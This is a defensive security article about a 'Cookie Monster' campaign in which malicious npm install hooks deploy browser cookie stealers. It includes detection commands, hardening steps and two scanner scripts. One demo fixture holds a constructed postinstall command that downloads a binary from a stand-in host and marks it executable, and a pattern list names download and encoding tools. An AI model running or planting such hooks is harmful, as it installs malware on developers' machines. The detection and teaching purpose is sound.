Operation Cookie Monster: How Hackers Stole Your GitHub Account and Why 2FA Isn’t Enough + Video


Introduction:

A sophisticated, credential-stealing campaign dubbed “Cookie Monster” is targeting software developers by hijacking browser sessions to bypass multi-factor authentication (MFA). This attack doesn’t just steal passwords; it pilfers session cookies, granting attackers direct, authenticated access to accounts on platforms like GitHub, GitLab, and potentially Google or Microsoft services. This article deconstructs the attack chain, from malicious npm packages to cookie theft, and provides actionable defense strategies for developers and enterprises.

Learning Objectives:

  • Understand the “Cookie Monster” attack flow from dependency poisoning to session hijacking.
  • Learn to identify malicious npm packages and suspicious system processes.
  • Implement terminal and browser hardening techniques to mitigate session cookie theft.

You Should Know:

1. The Attack Vector: Malicious npm Packages & OAuth Phishing

The attack begins with social engineering or typosquatting, tricking developers into installing a malicious npm package. Alternatively, attackers use fake OAuth applications on platforms like GitHub, requesting excessive permissions. Once authorized, these apps can access user data and repositories. The malicious package, once installed, executes a post-install script that deploys the real payload.

Step-by-step guide:

1. Dependency Check: Always audit packages before installation.

```bash
# Inspect package metadata (maintainers, publish dates, recent versions) for anomalies
npm view <package-name>
# Run `npm audit` on your project regularly to surface known-vulnerable dependencies
npm audit
```

2. OAuth Audit: Regularly review authorized applications on your accounts.
– GitHub: Settings > Applications > Authorized OAuth Apps.
– Revoke any unfamiliar or unused applications.
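`npm view` and `npm audit` do not show you what a package will execute at install time. The script below is an added example, not code from the article: it walks a `node_modules` tree, collects the `preinstall`/`install`/`postinstall`/`prepare` hooks from each `package.json`, and flags hooks that download or execute remote content. The three package manifests it builds (names, commands and the `example.invalid` URL) are constructed for the demonstration; the pattern list is a starting point, not a complete malware signature.

```python
"""Added example (not from the original article): flag npm packages whose
install-time lifecycle scripts download or execute remote content.

Package names, scripts and the URL below are constructed for the demonstration;
example.invalid is a reserved, non-resolving domain.
"""
import json
import os
import re
import tempfile

# npm runs these hooks automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns that an install hook rarely needs for legitimate reasons.
SUSPICIOUS = (
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "remote download"),
    (re.compile(r"\b(powershell|pwsh)\b", re.I), "PowerShell launch"),
    (re.compile(r"\b(base64|atob|fromCharCode)\b", re.I), "encoded content"),
    (re.compile(r"\bnode\s+-e\b", re.I), "inline node eval"),
    (re.compile(r"https?://", re.I), "hard-coded URL"),
    (re.compile(r"chmod\s+\+x|\.AppImage\b|\.exe\b", re.I), "drops or runs a binary"),
)


def inspect_package(pkg_json_path):
    """Return (name, [(hook, command, [reasons])]) for the lifecycle hooks of one package.json."""
    with open(pkg_json_path, encoding="utf-8") as fh:
        data = json.load(fh)
    scripts = data.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            reasons = [label for pattern, label in SUSPICIOUS if pattern.search(cmd)]
            findings.append((hook, cmd, reasons))
    return data.get("name", pkg_json_path), findings


def scan_node_modules(root):
    """Walk a node_modules tree; return {package name: findings} for packages that define hooks."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        name, findings = inspect_package(os.path.join(dirpath, "package.json"))
        if findings:
            report[name] = findings
    return report


def risky_packages(report):
    """Names of packages with at least one hook that matched a suspicious pattern."""
    return sorted(name for name, findings in report.items()
                  if any(reasons for _hook, _cmd, reasons in findings))


def build_demo_tree():
    """Write three constructed packages into a temporary node_modules and return its path."""
    packages = {
        "clean-lib": {"name": "clean-lib", "version": "1.0.0"},
        # A hook by itself is not evidence of malice: native addons build on install.
        "native-helper": {"name": "native-helper", "version": "2.1.0",
                          "scripts": {"postinstall": "node scripts/build-native.js"}},
        # Constructed look-alike package whose hook fetches and marks a binary executable.
        "colorz-utils": {"name": "colorz-utils", "version": "0.0.3",
                         "scripts": {"postinstall":
                                     "curl -s https://example.invalid/update -o /tmp/update.AppImage"
                                     " && chmod +x /tmp/update.AppImage"}},
    }
    root = os.path.join(tempfile.mkdtemp(), "node_modules")
    for name, manifest in packages.items():
        os.makedirs(os.path.join(root, name))
        with open(os.path.join(root, name, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    demo_report = scan_node_modules(build_demo_tree())
    for pkg, findings in demo_report.items():
        for hook, cmd, reasons in findings:
            verdict = "SUSPICIOUS: " + ", ".join(reasons) if reasons else "review manually"
            print(f"{pkg:15} {hook:12} [{verdict}] {cmd}")
```

Point `scan_node_modules` at a real project's `node_modules` to get the same report; packages listed with an empty reason list still deserve a glance, since any hook runs with your user's privileges during `npm install`. Setting `ignore-scripts=true` in `.npmrc` stops hooks from running at all, at the cost of breaking packages that genuinely need them.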

2. The Payload: Cross-Platform Cookie Hijackers

The post-install script downloads a platform-specific binary (e.g., `cookies.exe` for Windows, a disguised `.AppImage` for Linux). This binary is a stealer designed to locate, decrypt, and exfiltrate session cookies from browsers like Chrome, Edge, and Brave. It targets specific paths and uses the system’s cryptographic APIs to decrypt cookies stored in databases like `Cookies` under `%LocalAppData%` or `~/.config`.

Step-by-step guide (Identification):

1. Linux Process Inspection: Check for suspicious processes using system monitoring tools.

```bash
# List all running processes and look for unknown binaries
ps aux | grep -iE '(cook|appimage|update)' | grep -v grep
# Check for recently modified AppImages or "cook*" files in /tmp or your home directory
find ~ /tmp -type f \( -name "*.AppImage" -o -name "*cook*" \) -mtime -1
```

2. Windows Command Prompt / PowerShell:

```bat
:: Command Prompt: list processes whose name or window title mentions "cookie" or "update"
tasklist /v | findstr /i "cookie update"
```

```powershell
# PowerShell: match on process name, or on an executable running from a temp directory
Get-Process | Where-Object { $_.ProcessName -like "*cook*" -or $_.Path -like "*\Temp\*" }
```

3. Data Exfiltration: C2 Communication and Evasion

The stolen cookies are encrypted and sent to a Command and Control (C2) server, often via a POST request to a legitimate-looking domain (e.g., contentfonts[.]org). The malware uses `curl` or `wget` on Linux and `PowerShell` on Windows for this communication, often blending with normal traffic.

Step-by-step guide (Network Monitoring):

  1. Linux: Use `netstat` or `ss` to spot unexpected connections.

```bash
# Show sockets with their owning process; filter for download tools the stealer is known to use
sudo ss -tunp | grep -E '(curl|wget|powershell)'
```

  2. Windows: Use built-in tools like `netstat` or Resource Monitor.

```powershell
# Command Prompt: list established TCP connections with their owning PID
netstat -ano | findstr ESTABLISHED
# PowerShell: join each established connection to the process that owns it
Get-NetTCPConnection -State Established |
  Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess,
    @{ Name = 'Process'; Expression = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } }
```

4. Mitigation 1: Hardening Your Browser & Session Security

Since the attack relies on stealing cookies, make it harder for stealers to access and use them.

Step-by-step guide:

  1. Use Profile Separation: Employ different browser profiles or even separate browsers for sensitive development accounts (GitHub) versus general browsing.
  2. Lock Browser Profiles: Use browser features or extensions that require a password to access saved passwords/cookies.
  3. Clear Sessions: Log out of critical accounts after use, especially on shared machines. This invalidates the session cookie.
  4. Review Active Sessions: On platforms like GitHub, regularly check and revoke unfamiliar active sessions under security settings.

5. Mitigation 2: System-Level Protections and Monitoring

Defend against the initial execution and persistence of the stealer binary.

Step-by-step guide:

1. Linux File Integrity & Permissions:

```bash
# Set restrictive permissions on the browser profile directory (may break updates)
chmod 700 ~/.config/google-chrome/Default
# Use `auditd` to record every write, attribute change and read of the cookie database
sudo auditctl -w ~/.config/google-chrome/Default/Cookies -p war -k browser_cookies
```

2. Windows Defender Application Control (WDAC): Create a policy to allow only authorized software.

```powershell
# Begin WDAC policy creation (requires admin); scans installed binaries and allows them by publisher
New-CIPolicy -Level Publisher -FilePath C:\Policy.xml -UserPEs
```

3. Endpoint Detection and Response (EDR): Ensure EDR/AV is running and configured to alert on suspicious process spawning (e.g., `curl` spawning from an npm post-install script).
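The `auditctl` rule in step 1 only produces log lines; somebody still has to read them. The following added example (not code from the article) parses auditd `SYSCALL` records from `/var/log/audit/audit.log`, keeps those tagged with the `browser_cookies` key from that rule, and alerts when the executable that opened the cookie database is not the browser itself. The log lines are constructed, as are the allowlisted browser path and the stealer's path; only the record layout is real auditd format.

```python
"""Added example (not from the original article): alert on any executable other
than the browser touching the Chrome cookie store, using the SYSCALL records that
the article's `auditctl ... -k browser_cookies` rule produces.
The log lines, the allowlist and the paths in them are constructed.
"""
import re

# Binaries expected to open the cookie store on this host (hypothetical allowlist).
ALLOWED_EXES = {"/opt/google/chrome/chrome"}

# audit.log records are space-separated key=value pairs; string values are double-quoted.
AUDIT_KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
MSG_ID_RE = re.compile(r"audit\((\d+\.\d+):(\d+)\)")

# Constructed records: the browser reading its own database, the PATH record that
# accompanies it, an unknown AppImage reading the same file, and an unrelated key.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1712345678.101:9001): arch=c000003e syscall=257 success=yes exit=5 items=1 ppid=2900 pid=3101 auid=1000 uid=1000 comm="chrome" exe="/opt/google/chrome/chrome" key="browser_cookies"
type=PATH msg=audit(1712345678.101:9001): item=0 name="/home/dev/.config/google-chrome/Default/Cookies" inode=131 mode=0100600
type=SYSCALL msg=audit(1712345702.440:9014): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=4400 pid=4417 auid=1000 uid=1000 comm="update" exe="/tmp/.update/update.AppImage" key="browser_cookies"
type=SYSCALL msg=audit(1712345710.002:9020): arch=c000003e syscall=257 success=yes exit=4 items=1 ppid=1 pid=700 auid=4294967295 uid=0 comm="cron" exe="/usr/sbin/cron" key="cron_jobs"
"""


def parse_audit_record(line):
    """Turn one audit.log line into a dict of its fields, with quotes stripped and the
    msg=audit(TIMESTAMP:SERIAL) header split into 'timestamp' and 'serial'."""
    record = {key: value.strip('"') for key, value in AUDIT_KV_RE.findall(line)}
    header = MSG_ID_RE.search(line)
    if header:
        record["timestamp"] = float(header.group(1))
        record["serial"] = int(header.group(2))
    return record


def find_cookie_access(log_text, watch_key="browser_cookies", allowed=ALLOWED_EXES):
    """Return SYSCALL records carrying watch_key whose exe is not on the allowlist.

    Failed opens (success=no) are kept too: a stealer bouncing off chmod 700 is
    still worth knowing about, so the alert records the outcome instead of filtering it.
    """
    alerts = []
    for line in log_text.splitlines():
        rec = parse_audit_record(line)
        if rec.get("type") != "SYSCALL" or rec.get("key") != watch_key:
            continue
        if rec.get("exe") in allowed:
            continue
        alerts.append({
            "timestamp": rec.get("timestamp"),
            "serial": rec.get("serial"),
            "pid": int(rec["pid"]),
            "ppid": int(rec["ppid"]),
            "comm": rec.get("comm"),
            "exe": rec.get("exe"),
            "success": rec.get("success") == "yes",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_cookie_access(SAMPLE_AUDIT_LOG):
        outcome = "READ" if alert["success"] else "DENIED"
        print(f"[{outcome}] pid={alert['pid']} ppid={alert['ppid']} "
              f"comm={alert['comm']} exe={alert['exe']} serial={alert['serial']}")
```

Run it against the real file with `find_cookie_access(open("/var/log/audit/audit.log").read())` as root, or wire the same logic into whatever ships your audit logs; `ausearch -k browser_cookies` produces the same records if you prefer to pre-filter. The `ppid` in each alert is the pivot back to the process tree, which is where an `npm` or `node` parent would confirm the install-script origin the article describes.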

6. For Organizations: Secure Software Development Lifecycle (SSDL)

Enterprises must shift security left to prevent such attacks at the source.

Step-by-step guide:

  1. Mandate Package Audits: Use automated tools in CI/CD pipelines.

```yaml
# Example GitHub Actions step: fail the job when npm audit reports high-severity advisories
- name: Run npm audit
  run: npm audit --audit-level=high
```

  2. Implement Artifact Registry Proxies: Use private, vetted npm registries (like GitHub Packages, Artifactory) that cache public packages and scan for malware.
  3. Developer Security Training: Conduct regular training on software supply chain attacks, typosquatting, and OAuth security hygiene.

What Undercode Say:

  • Session is the New Password: The era of password/MFA-only security is fading. The session token is now the crown jewel, and its protection requires a paradigm shift in defense strategies, focusing on endpoint integrity and browser hardening.
  • Supply Chain is the Soft Underbelly: Attacks leveraging trusted ecosystems (npm, OAuth) are devastatingly effective. Security must be embedded into the development pipeline itself, not bolted on at the perimeter.

The “Cookie Monster” campaign exposes a fundamental weakness in modern authentication architecture. While MFA prevents credential stuffing, it is useless against session hijacking once the user is authenticated. This attack is not novel in technique but is highly targeted and effective against a high-value community: developers with code and infrastructure access. Future attacks will refine this model, targeting cookies for cloud consoles (AWS, Azure) and SaaS platforms, moving beyond data theft to direct resource hijacking and infrastructure sabotage. The defense requires a layered approach: vigilant developer practices, robust endpoint security, and a zero-trust mindset that treats every session as potentially compromised.

Reported By: Stephenpangborn Cybersecurity – Hackers Feeds